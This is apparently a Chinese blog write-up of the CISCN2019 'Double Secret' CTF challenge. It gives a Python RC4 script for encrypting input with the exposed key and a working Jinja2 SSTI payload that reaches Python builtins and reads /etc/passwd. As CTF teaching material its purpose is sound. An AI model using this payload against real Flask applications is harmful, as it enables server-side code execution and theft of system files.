[CISCN2019 华东南赛区]Double Secret

作者: const27 分类: All,SSTI漏洞,杂七杂八的安全问题 发布时间: 2020-06-26 12:32

知识点:RC4解密,ssti

进来后你们肯定一定来到了这一步

当secret字符长度超过4就会报错,我们在报错界面看到了这个

render_template_string,意味着ssti存在的可能性.同时这里对secret传入的字符进行了rc4加密处理,密钥都暴露出来了.我们只需把我们传入的值用rc4解密一下,传进去被加密出来然后被render_template_string调用,触发ssti即可.

rc4解密脚本

import base64
from urllib import parse

def rc4_main(key = "init_key", message = "init_message"):#返回加密后得内容
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt

def rc4_init_sbox(key):
    s_box = list(range(256)) 
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box
def rc4_excrypt(plain, box):
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256 
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))

key = "HereIsTreasure"  #此处为密文
message = input("请输入明文:\n")
enc_base64 = rc4_main( key , message )
enc_init = str(base64.b64decode(enc_base64),'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:"+enc_url)

ssti就完事了,ssti的payload也很简单,很早之前就被收录进我的
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}{% endif %}{% endfor %}

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云